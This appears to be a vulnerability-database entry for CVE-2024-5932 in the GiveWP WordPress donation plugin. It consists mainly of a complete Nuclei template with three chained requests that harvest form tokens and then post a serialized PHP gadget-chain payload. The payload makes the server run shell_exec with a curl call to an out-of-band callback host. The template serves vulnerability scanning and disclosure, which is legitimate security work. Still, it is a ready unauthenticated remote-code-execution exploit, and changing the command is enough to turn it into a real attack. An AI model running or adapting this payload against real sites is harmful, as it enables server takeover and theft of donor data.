漏洞描述
The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter.
CVE-2024-5932: GiveWP - PHP Object Injection
PoC代码[已公开]
id: CVE-2024-5932
info:
name: GiveWP - PHP Object Injection
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter.
impact: |
This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.
remediation: Fixed in 3.14.2.
reference:
- https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/includes/login-register.php#L235
- https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/includes/process-donation.php#L420
- https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/src/DonorDashboards/Tabs/EditProfileTab/AvatarRoute.php#L51
- https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/vendor/tecnickcom/tcpdf/tcpdf.php#L7861
- https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/vendor/vendor-prefixed/fakerphp/faker/src/Faker/ValidGenerator.php#L80
- https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932/
- https://thehackernews.com/2024/08/givewp-wordpress-plugin-vulnerability.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-5932
cwe-id: CWE-502
epss-score: 0.94018
epss-percentile: 0.9989
cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: givewp
product: givewp
framework: wordpress
publicwww-query: "/wp-content/plugins/give/"
tags: cve,cve2024,rce,wp,wp-plugin,wordpress,oast,givewp,vkev
flow: http(1) && http(2) && http(3)
variables:
oast: "{{interactsh-url}}"
len_payload: "{{ len(oast) + 5 }}"
payload: 'O:19:"Stripe\\\\StripeObject":1:{s:7:"_values";a:1:{i:0;O:62:"Give\\\\PaymentGateways\\\\DataTransferObjects\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:9:"container";O:33:"Give\\\\Vendors\\\\Faker\\\\ValidGenerator":3:{s:9:"generator";O:24:"Give\\\\Container\\\\Container":1:{s:9:"instances";a:1:{s:8:"address1";s:{{len_payload}}:"curl {{oast}}";}}s:10:"maxRetries";i:1;s:9:"validator";s:10:"shell_exec";}}}}}}'
email: "{{to_lower(rand_text_alpha(8))}}@gmail.com"
firstname: "{{to_lower(rand_text_alpha(5))}}"
lastname: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
GET /wp-json/wp/v2/give_forms/ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '"type":'
- '"guid":'
condition: and
internal: true
extractors:
- type: json
part: body
name: value
internal: true
json:
- '.[0].slug'
- type: json
part: body
name: give-form-title
internal: true
json:
- '.[0].title.rendered'
- type: json
part: body
name: links
internal: true
json:
- '.[0].link'
- raw:
- |
GET /give/{{value}}?giveDonationFormInIframe=1 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- 'give-form-hash'
- 'give-form-id-prefix'
condition: and
internal: true
extractors:
- type: regex
part: body
group: 1
name: give-form-hash
internal: true
regex:
- 'name="give\-form\-hash" value="([0-9a-z]+)"'
- type: regex
part: body
group: 1
name: give-form-id-prefix
internal: true
regex:
- 'name="give\-form\-id\-prefix" value="([0-9-]+)"'
- type: regex
part: body
group: 1
name: give-form-id
internal: true
regex:
- 'name="give\-form\-id" value="([0-9]+)"'
- type: regex
part: body
group: 1
name: give-amount
internal: true
regex:
- 'give\-form\-minimum"\n\s+value="([0-9.]+)"\/>'
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
give-honeypot=&give-form-id-prefix={{give-form-id-prefix}}&give-form-id={{give-form-id}}&give-form-title={{give-form-title}}&give-current-url={{links}}&give-form-url={{RootURL}}&give-form-minimum={{give-amount}}&give-form-maximum=1000000&give-form-hash={{give-form-hash}}&give-price-id=custom&give-amount={{give-amount}}&give_first={{firstname}}&give_last={{lastname}}&give_email={{email}}&give_stripe_payment_method=&give-user-id=1&give_action=purchase&give-gateway=manual&give_embed_form=1&action=give_process_donation&&give_title={{payload}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- '"error_data"'
- '"unknown_error"'
condition: and
# digest: 4a0a004730450220066f00f0b55ed16e63aa2116c217f34d0c019d9d1eb58dbf13fc0870e1e55b41022100bfb0d8c6dbad667c36d2f1ad1a533cf81c9976e8c8fb0cf9d1589431d5808a69:922c64590222798bb761d5b6d8e72950